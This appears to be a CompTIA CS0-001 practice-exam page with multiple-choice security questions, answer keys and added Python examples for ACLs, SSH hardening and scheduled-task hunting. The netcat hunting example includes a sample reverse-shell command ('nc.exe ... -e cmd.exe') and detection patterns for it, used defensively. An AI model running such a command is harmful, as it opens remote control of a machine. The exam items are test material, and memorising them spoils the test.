Pinpoint CS0-001 Samples 2021

We provide CompTIA CS0-001 practice exam questions intended to help candidates pass the CS0-001 test and earn the CompTIA CSA+ certification. The CS0-001 Questions & Answers cover the knowledge areas of the real CS0-001 exam. Note that several answer keys in the sample set below have been corrected where the original key was wrong; a one-line rationale is given in each such case.

NEW QUESTION 1

A corporation employs a number of small-form-factor workstations and mobile devices, and an incident response team is therefore required to build a forensics kit with tools to support chip-off analysis. Which of the following tools would BEST meet this requirement?

  • A. JTAG adapters
  • B. Last-level cache readers
  • C. Write-blockers
  • D. ZIF adapters

Answer: D (chip-off analysis physically removes the flash chip and reads it in a ZIF socket; a JTAG adapter supports the separate JTAG technique, which leaves the chip on the board)

NEW QUESTION 2

Policy allows scanning of vulnerabilities during production hours, but production servers have been crashing lately due to unauthorized scans performed by junior technicians. Which of the following is the BEST solution to avoid production server downtime due to these types of scans?

  • A. Transition from centralized to agent-based scans
  • B. Require vulnerability scans be performed by trained personnel.
  • C. Configure daily automated detailed vulnerability reports.
  • D. Scan only as required to regulatory compliance.
  • E. Implement sandboxing to analyze the results of each scan.

Answer: B

NEW QUESTION 3

A common mobile device vulnerability has made unauthorized modifications to a device. The device owner removes the vendor/carrier provided limitations on the mobile device. This is also known as:

  • A. jailbreaking.
  • B. cracking.
  • C. hashing.
  • D. fuzzing.

Answer: A

NEW QUESTION 4

Weeks before a proposed merger is scheduled for completion, a security analyst has noticed unusual traffic patterns on a file server that contains financial information. Routine scans are not detecting the signature of any known exploits or malware. The following entry is seen in the server logs:
tftp -i 10.1.1.1 GET fourthquarterreport.xls
Which of the following is the BEST course of action?

  • A. Continue to monitor the situation using tools to scan for known exploits.
  • B. Implement an ACL on the perimeter firewall to prevent data exfiltration.
  • C. Follow the incident response procedure associated with the loss of business-critical data.
  • D. Determine if any credit card information is contained on the server containing the financials.

Answer: C

NEW QUESTION 5

The development team recently moved a new application into production for the accounting department. After this occurred, the Chief Information Officer (CIO) was contacted by the head of accounting because the application is missing a key piece of functionality that is needed to complete the corporation’s quarterly tax returns. Which of the following types of testing would help prevent this from reoccurring?

  • A. Security regression testing
  • B. User acceptance testing
  • C. Input validation testing
  • D. Static code testing

Answer: B

NEW QUESTION 6

Which of the following is a vulnerability when using Windows as a host OS for virtual machines?

  • A. Windows requires frequent patching.
  • B. Windows virtualized environments are typically unstable.
  • C. Windows requires hundreds of open firewall ports to operate.
  • D. Windows is vulnerable to the "ping of death".

Answer: A (frequent host patching and the reboots it forces affect every guest on the host; the "ping of death" is a long-patched historical issue, not a host-OS concern)

NEW QUESTION 7

After reviewing the following packet, a cybersecurity analyst has discovered an unauthorized service is running on a company’s computer.
(Exhibit not reproduced in this copy.)
Which of the following ACLs, if implemented, will prevent further access ONLY to the unauthorized service and will not impact other services?

  • A. DENY TCP ANY HOST 10.38.219.20 EQ 3389
  • B. DENY IP HOST 10.38.219.20 ANY EQ 25
  • C. DENY IP HOST 192.168.1.10 HOST 10.38.219.20 EQ 3389
  • D. DENY TCP ANY HOST 192.168.1.10 EQ 25

Answer: A
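The four candidate entries evaluated against sample traffic, as an added example that is not part of the original page or any vendor documentation. Because the exhibit is missing from this copy, the example assumes (as answer A implies) that the unauthorized service is RDP, TCP/3389, on 10.38.219.20; the flows are constructed, and the matcher implements the Cisco-style `DENY <proto> <src> <dst> [EQ <port>]` syntax only as far as the four candidates need.

```python
"""Which candidate ACE blocks only the unauthorized service?

Added example. Assumption: the unauthorized service is RDP (TCP/3389)
on 10.38.219.20. Flows below are constructed.
"""
from dataclasses import dataclass
from typing import Optional, Set


@dataclass(frozen=True)
class Ace:
    proto: str            # "tcp", "udp" or "ip" (ip = any protocol)
    src: str              # "any" or "host <ip>"
    dst: str              # "any" or "host <ip>"
    dport: Optional[int]  # None = any destination port


@dataclass(frozen=True)
class Flow:
    proto: str
    src_ip: str
    dst_ip: str
    dport: int


def parse_ace(text: str) -> Ace:
    """Parse 'DENY <proto> (ANY|HOST <ip>) (ANY|HOST <ip>) [EQ <port>]'."""
    tok = text.upper().split()
    if tok[0] != "DENY":
        raise ValueError("only DENY entries are modelled")
    proto = tok[1].lower()
    pos = 2

    def addr() -> str:
        nonlocal pos
        if tok[pos] == "ANY":
            pos += 1
            return "any"
        if tok[pos] == "HOST":
            pos += 2
            return "host " + tok[pos - 1]
        raise ValueError("unexpected token " + tok[pos])

    src, dst = addr(), addr()
    dport = int(tok[pos + 1]) if pos < len(tok) and tok[pos] == "EQ" else None
    return Ace(proto, src, dst, dport)


def ace_matches(ace: Ace, flow: Flow) -> bool:
    if ace.proto != "ip" and ace.proto != flow.proto:
        return False
    if ace.src != "any" and ace.src != "host " + flow.src_ip:
        return False
    if ace.dst != "any" and ace.dst != "host " + flow.dst_ip:
        return False
    return ace.dport is None or ace.dport == flow.dport


CANDIDATES = {
    "A": "DENY TCP ANY HOST 10.38.219.20 EQ 3389",
    "B": "DENY IP HOST 10.38.219.20 ANY EQ 25",
    "C": "DENY IP HOST 192.168.1.10 HOST 10.38.219.20 EQ 3389",
    "D": "DENY TCP ANY HOST 192.168.1.10 EQ 25",
}

# Constructed traffic: the two RDP flows must be blocked, the rest must keep working.
FLOWS = {
    "rdp_from_192.168.1.10": Flow("tcp", "192.168.1.10", "10.38.219.20", 3389),
    "rdp_from_10.0.0.5":     Flow("tcp", "10.0.0.5", "10.38.219.20", 3389),
    "https_to_host":         Flow("tcp", "10.0.0.5", "10.38.219.20", 443),
    "smtp_from_host":        Flow("tcp", "10.38.219.20", "10.0.0.9", 25),
    "smtp_to_192.168.1.10":  Flow("tcp", "10.0.0.5", "192.168.1.10", 25),
}
UNAUTHORIZED = {"rdp_from_192.168.1.10", "rdp_from_10.0.0.5"}


def blocked_flows(ace_text: str) -> Set[str]:
    """Names of the constructed flows a single ACE would deny."""
    ace = parse_ace(ace_text)
    return {name for name, flow in FLOWS.items() if ace_matches(ace, flow)}


def best_candidate() -> Optional[str]:
    """Letter of the ACE that denies exactly the unauthorized flows, if any."""
    for letter, text in CANDIDATES.items():
        if blocked_flows(text) == UNAUTHORIZED:
            return letter
    return None


if __name__ == "__main__":
    for letter, text in CANDIDATES.items():
        print(letter, sorted(blocked_flows(text)))
    print("best:", best_candidate())
```

Running it shows why only A fits: C blocks RDP from a single source and leaves every other client connected, B touches outbound mail from the host, and D blocks mail to an unrelated address. On real gear also remember that an ACE needs a matching permit after it, and that a `DENY IP ... EQ` entry such as B or C is not even valid syntax on most platforms, since port matching requires TCP or UDP.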

NEW QUESTION 8

A security administrator uses FTK to take an image of a hard drive that is under investigation. Which of the following processes are used to ensure the image is the same as the original disk? (Choose two.)

  • A. Validate the folder and file directory listings on both.
  • B. Check the hash value between the image and the original.
  • C. Boot up the image and the original systems to compare.
  • D. Connect a write blocker to the imaging device.
  • E. Copy the data to a disk of the same size and manufacturer.

Answer: BD (the write blocker keeps the original unchanged while it is imaged, and matching hashes prove the image is bit-for-bit identical; booting either system would alter the evidence)

NEW QUESTION 9

A security analyst begins to notice the CPU utilization from a sinkhole has begun to spike. Which of the following describes what may be occurring?

  • A. Someone has logged on to the sinkhole and is using the device
  • B. The sinkhole has begun blocking suspect or malicious traffic
  • C. The sinkhole has begun rerouting unauthorized traffic
  • D. Something is controlling the sinkhole and causing CPU spikes due to malicious utilization.

Answer: C

NEW QUESTION 10

A malware infection spread to numerous workstations within the marketing department. The workstations were quarantined and replaced with machines.
Which of the following represents a FINAL step in the eradication of the malware?

  • A. The workstations should be isolated from the network.
  • B. The workstations should be donated for reuse.
  • C. The workstations should be reimaged.
  • D. The workstations should be patched and scanned.

Answer: D

NEW QUESTION 11

A worm was detected on multiple PCs within the remote office. The security analyst recommended that the remote office be blocked from the corporate network during the incident response. Which of the following processes BEST describes this recommendation?

  • A. Logical isolation of the remote office
  • B. Sanitization of the network environment
  • C. Segmentation of the network
  • D. Secure disposal of affected systems

Answer: A

NEW QUESTION 12

A security analyst is reviewing the following log after enabling key-based authentication.
(Exhibit not reproduced in this copy.)
Given the above information, which of the following steps should be performed NEXT to secure the system?

  • A. Disable anonymous SSH logins.
  • B. Disable password authentication for SSH.
  • C. Disable SSHv1.
  • D. Disable remote root SSH logins.

Answer: B
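An audit of the sshd_config settings this question turns on, as an added example that is not from the page. Directive names, case-insensitivity and the defaults for absent directives follow OpenSSH's sshd_config(5); the configuration text is constructed to match the scenario (key-based authentication just enabled, passwords still accepted). Match blocks are skipped, so only global settings are assessed.

```python
"""Report which hardening step comes NEXT for an sshd_config.

Added example. CURRENT_CONFIG and HARDENED_CONFIG are constructed.
"""
import re
from typing import Dict, List, Optional, Tuple

# Order matters: it is the order in which a hardening pass would fix things.
CHECKS = [
    ("PubkeyAuthentication", "yes"),
    ("PasswordAuthentication", "no"),
    ("PermitRootLogin", "no"),
    ("PermitEmptyPasswords", "no"),
]
# Values sshd uses when the directive is absent (sshd_config(5)).
DEFAULTS = {
    "PubkeyAuthentication": "yes",
    "PasswordAuthentication": "yes",
    "PermitRootLogin": "prohibit-password",
    "PermitEmptyPasswords": "no",
}
_CANON = {k.lower(): k for k in DEFAULTS}
_LINE = re.compile(r"^(\w+)\s*=?\s*(\S.*)$")   # "Key value" or "Key=value"


def effective_settings(config_text: str) -> Dict[str, str]:
    """Effective value of each checked directive.

    As in sshd, the first occurrence of a directive wins and names are
    case-insensitive. Everything after a Match line is conditional and ignored.
    """
    found: Dict[str, str] = {}
    in_match = False
    for raw in config_text.splitlines():
        line = raw.split("#", 1)[0].strip()       # drop comments
        m = _LINE.match(line)
        if not m:
            continue
        key, value = m.group(1).lower(), m.group(2).strip().lower()
        if key == "match":
            in_match = True
            continue
        if in_match or key not in _CANON:
            continue
        found.setdefault(_CANON[key], value)
    return {k: found.get(k, DEFAULTS[k].lower()) for k in DEFAULTS}


def findings(config_text: str) -> List[Tuple[str, str, str]]:
    """(directive, actual, wanted) for every check that fails, in fix order."""
    eff = effective_settings(config_text)
    return [(k, eff[k], want) for k, want in CHECKS if eff[k] != want]


def next_step(config_text: str) -> Optional[str]:
    """The directive to fix NEXT, or None when every check passes."""
    f = findings(config_text)
    return f[0][0] if f else None


# Constructed: the server in the question right after key-based auth was enabled.
CURRENT_CONFIG = """\
Port 22
PubkeyAuthentication yes
AuthorizedKeysFile .ssh/authorized_keys
PasswordAuthentication yes          # still on: passwords remain brute-forceable
#PermitRootLogin prohibit-password  # commented out, so the default applies
Match User backup
    PasswordAuthentication no
"""

HARDENED_CONFIG = """\
Port 22
PubkeyAuthentication yes
PasswordAuthentication no
PermitRootLogin no
PermitEmptyPasswords no
"""

if __name__ == "__main__":
    for name, cfg in (("current", CURRENT_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(name, "->", findings(cfg), "next:", next_step(cfg))
```

On a live host, `sshd -T` prints the effective configuration after defaults and Match processing, which is a more reliable input than the file itself. Whether root should be `no` or left at the default `prohibit-password` (keys only) is a policy decision; disabling password authentication is the step that removes the brute-force exposure the log in the question would show. Option C is moot on any OpenSSH from 7.4 onward, where server-side SSH protocol 1 no longer exists.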

NEW QUESTION 13

An analyst has initiated an assessment of an organization’s security posture. As a part of this review, the analyst would like to determine how much information about the organization is exposed externally. Which of the following techniques would BEST help the analyst accomplish this goal? (Select two.)

  • A. Fingerprinting
  • B. DNS query log reviews
  • C. Banner grabbing
  • D. Internet searches
  • E. Intranet portal reviews
  • F. Sourcing social network sites
  • G. Technical control audits

Answer: DF

NEW QUESTION 14

While preparing for a third-party audit, the vice president of risk management and the vice president of information technology have stipulated that the vendor may not use offensive software during the audit. This is an example of:

  • A. organizational control.
  • B. service-level agreement.
  • C. rules of engagement.
  • D. risk appetite.

Answer: C

NEW QUESTION 15

A cybersecurity analyst is retained by a firm for an open investigation. Upon arrival, the cybersecurity analyst reviews several security logs.
Given the following snippet of code:
(Exhibit not reproduced in this copy.)
Which of the following combinations BEST describes the situation and recommendations to be made for this situation?

  • A. The cybersecurity analyst has discovered host 192.168.0.101 using Windows Task Scheduler at 13:30 to run nc.exe; recommend proceeding with the next step of removing the host from the network.
  • B. The cybersecurity analyst has discovered host 192.168.0.101 to be running the nc.exe file at 13:30 using the auto cron job remotely; there are no recommendations since this is not a threat currently.
  • C. The cybersecurity analyst has discovered host 192.168.0.101 is beaconing every day at 13:30 using the nc.exe file; recommend proceeding with the next step of removing the host from the network.
  • D. The security analyst has discovered host 192.168.0.101 is a rogue device on the network, recommend proceeding with the next step of removing the host from the network.

Answer: A
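A hunt for the kind of scheduled netcat launch the question describes, as an added example that is not from the page. The CSV is constructed and uses a subset of the column names that `schtasks /query /fo CSV /v` prints; the suspect-binary list and the reverse-shell flag pattern are this example's own assumptions about what to look for, not an official signature.

```python
"""Flag scheduled tasks that launch netcat or hand out a shell.

Added example. SAMPLE is constructed; SUSPECT_BINARIES and REVERSE_SHELL
are assumptions, not a vendor signature.
"""
import csv
import io
import re
from typing import Dict, List

SUSPECT_BINARIES = {"nc.exe", "nc64.exe", "ncat.exe", "netcat.exe"}
# netcat's "-e <program>" hands that program to whoever connects.
REVERSE_SHELL = re.compile(r"(?:^|\s)-e\s+\S*cmd(?:\.exe)?(?:\s|$)", re.I)
IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def first_token(command: str) -> str:
    """Program path from a Windows command line (honours a quoted path)."""
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        return command[1:end] if end > 0 else command[1:]
    return command.split(None, 1)[0] if command else ""


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def suspicious_tasks(csv_text: str) -> List[Dict[str, object]]:
    """One record per task that trips at least one indicator."""
    hits = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        cmd = row["Task To Run"]
        reasons = []
        exe = basename(first_token(cmd))
        if exe in SUSPECT_BINARIES:
            reasons.append("suspect binary " + exe)
        if REVERSE_SHELL.search(cmd):
            reasons.append("reverse-shell flag (-e cmd)")
        for ip in IPV4.findall(cmd):
            reasons.append("remote address in arguments: " + ip)
        if reasons:
            hits.append({
                "host": row["HostName"],
                "task": row["TaskName"],
                "runs": f'{row["Schedule Type"]} at {row["Start Time"]} as {row["Run As User"]}',
                "command": cmd,
                "reasons": reasons,
            })
    return hits


# Constructed schtasks output; the \Updater task is the one the question describes.
SAMPLE = r'''"HostName","TaskName","Status","Task To Run","Schedule Type","Start Time","Run As User"
"WS-0101","\Microsoft\Windows\Defrag\ScheduledDefrag","Ready","%windir%\system32\defrag.exe -c -h -o -$","Weekly","01:00:00","SYSTEM"
"WS-0101","\Updater","Ready","C:\Users\Public\nc.exe 203.0.113.5 4444 -e cmd.exe","Daily","13:30:00","SYSTEM"
"WS-0101","\Backup","Ready","""C:\Program Files\Backup\backup.exe"" --full","Daily","13:30:00","svc_backup"
'''

if __name__ == "__main__":
    for hit in suspicious_tasks(SAMPLE):
        print(hit["host"], hit["task"], hit["runs"])
        for reason in hit["reasons"]:
            print("   -", reason)
```

The output supports exactly what answer A states and no more: the task scheduler runs nc.exe at 13:30. A daily schedule and a remote address in the arguments are strong hints of beaconing (answer C), but that is a conclusion the firewall or proxy logs have to confirm before it goes in the report; the host comes off the network either way.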

NEW QUESTION 16

An organization wants to remediate vulnerabilities associated with its web servers. An initial vulnerability scan has been performed, and analysts are reviewing the results. Before starting any remediation, the analysts want to remove false positives to avoid spending time on issues that are not actual vulnerabilities. Which of the following would be an indicator of a likely false positive?

  • A. Reports show the scanner compliance plug-in is out-of-date.
  • B. Any items labeled ‘low’ are considered informational only.
  • C. The scan result version is different from the automated asset inventory.
  • D. ‘HTTPS’ entries indicate the web page is encrypted securely.

Answer: A (an out-of-date plug-in can report conditions that no longer apply; 'low' items are still real findings, a version mismatch with the asset inventory is an inventory problem, and HTTPS says nothing about whether a page is vulnerable)

NEW QUESTION 17

While a threat intelligence analyst was researching an indicator of compromise on a search engine, the web proxy generated an alert regarding the same indicator. The threat intelligence analyst states that related sites were not visited but were searched for in a search engine. Which of the following MOST likely happened in this situation?

  • A. The analyst is not using the standard approved browser.
  • B. The analyst accidently clicked a link related to the indicator.
  • C. The analyst has prefetch enabled on the browser in use.
  • D. The alert in unrelated to the analyst’s search.

Answer: C

NEW QUESTION 18

Which of the following has the GREATEST impact on the data retention policies of an organization?

  • A. The CIA classification matrix assigned to each piece of data
  • B. The level of sensitivity of the data established by the data owner
  • C. The regulatory requirements concerning the data set
  • D. The technical constraints of the technology used to store the data

Answer: C (retention periods are driven by regulatory and legal obligations on the data; storage technology is chosen to meet them, not the other way round)

NEW QUESTION 19

Which of the following represent the reasoning behind careful selection of the timelines and time-of-day boundaries for an authorized penetration test? (Select TWO).

  • A. To schedule personnel resources required for test activities
  • B. To determine frequency of team communication and reporting
  • C. To mitigate unintended impacts to operations
  • D. To avoid conflicts with real intrusions that may occur
  • E. To ensure tests have measurable impact to operations

Answer: AC

NEW QUESTION 20

A security analyst received several service tickets reporting that a company storefront website is not accessible by internal domain users. However, external users are accessing the website without issue. Which of the following is the MOST likely reason for this behavior?

  • A. The FQDN is incorrect.
  • B. The DNS server is corrupted.
  • C. The time synchronization server is corrupted.
  • D. The certificate is expired.

Answer: B

NEW QUESTION 21

While reviewing firewall logs, a security analyst at a military contractor notices a sharp rise in activity from a foreign domain known to have well-funded groups that specifically target the company's R&D department. Historical data reveals other corporate assets were previously targeted. This evidence MOST likely describes:

  • A. an APT.
  • B. DNS harvesting.
  • C. a zero-day exploit.
  • D. corporate espionage.

Answer: A

NEW QUESTION 22

A cybersecurity analyst is reviewing the following outputs:
(Exhibit not reproduced in this copy.)
Which of the following can the analyst infer from the above output?

  • A. The remote host is redirecting port 80 to port 8080.
  • B. The remote host is running a service on port 8080.
  • C. The remote host’s firewall is dropping packets for port 80.
  • D. The remote host is running a web server on port 80.

Answer: B

NEW QUESTION 23

In reviewing firewall logs, a security analyst has discovered the following IP address, which several employees are using frequently:
152.100.57.18
The organization’s servers use IP addresses in the 192.168.0.1/24 CIDR. Additionally, the analyst has noticed that corporate data is being stored at this new location. A few of these employees are on the management and executive management teams. The analyst has also discovered that there is no record of this IP address or service in reviewing the known locations of managing system assets. Which of the following is occurring in this scenario?

  • A. Malicious process
  • B. Unauthorized change
  • C. Data exfiltration
  • D. Unauthorized access

Answer: C

NEW QUESTION 24

Management wants to scan servers for vulnerabilities on a periodic basis. Management has decided that the scan frequency should be determined only by vendor patch schedules and the organization’s application deployment schedule. Which of the following would force the organization to conduct an out-of-cycle vulnerability scan?

  • A. Newly discovered PII on a server
  • B. A vendor releases a critical patch update
  • C. A critical bug fix in the organization’s application
  • D. False positives identified in production

Answer: A (vendor patch releases and the organization's own bug fixes are already covered by the two schedules management chose; newly discovered PII changes the asset's classification and is the one event that falls outside them)

NEW QUESTION 25

A company has decided to process credit card transactions directly. Which of the following would meet the requirements for scanning this type of data?

  • A. Quarterly
  • B. Yearly
  • C. Bi-annually
  • D. Monthly

Answer: A

NEW QUESTION 26

A security analyst wants to scan the network for active hosts. Which of the following host characteristics help to differentiate between a virtual and physical host?

  • A. Reserved MACs
  • B. Host IPs
  • C. DNS routing tables
  • D. Gateway settings

Answer: A

NEW QUESTION 27

While reviewing three months of logs, a security analyst notices probes from random company laptops going to SCADA equipment at the company’s manufacturing location. Some of the probes are getting responses from the equipment even though firewall rules are in place, which should block this type of unauthorized activity. Which of the following should the analyst recommend to keep this activity from originating from company laptops?

  • A. Implement a group policy on company systems to block access to SCADA networks.
  • B. Require connections to the SCADA network to go through a forwarding proxy.
  • C. Update the firewall rules to block SCADA network access from those laptop IP addresses.
  • D. Install security software and a host-based firewall on the SCADA equipment.

Answer: A

NEW QUESTION 28

Which of the following countermeasures should the security administrator apply to MOST effectively mitigate rootkit-level infections of the organization's workstation devices?

  • A. Remove local administrator privileges.
  • B. Configure a BIOS-level password on the device.
  • C. Install a secondary virus protection application.
  • D. Enforce a system state recovery after each device reboot.

Answer: A

NEW QUESTION 29

A penetration tester is preparing for an audit of critical systems that may impact the security of the environment. The audit includes the external perimeter and the internal side of the environment. During which of the following processes is this type of information normally gathered?

  • A. Timing
  • B. Scoping
  • C. Authorization
  • D. Enumeration

Answer: B

NEW QUESTION 30

A recent audit has uncovered several coding errors and a lack of input validation being used on a public portal. Due to the nature of the portal and the severity of the errors, the portal is unable to be patched. Which of the following tools could be used to reduce the risk of being compromised?

  • A. Web application firewall
  • B. Network firewall
  • C. Web proxy
  • D. Intrusion prevention system

Answer: A

NEW QUESTION 31
......

P.S. The full Exambible CS0-001 question set (363 Q&As, PDF version) is available at: https://www.exambible.com/CS0-001-exam/ (363 New Questions)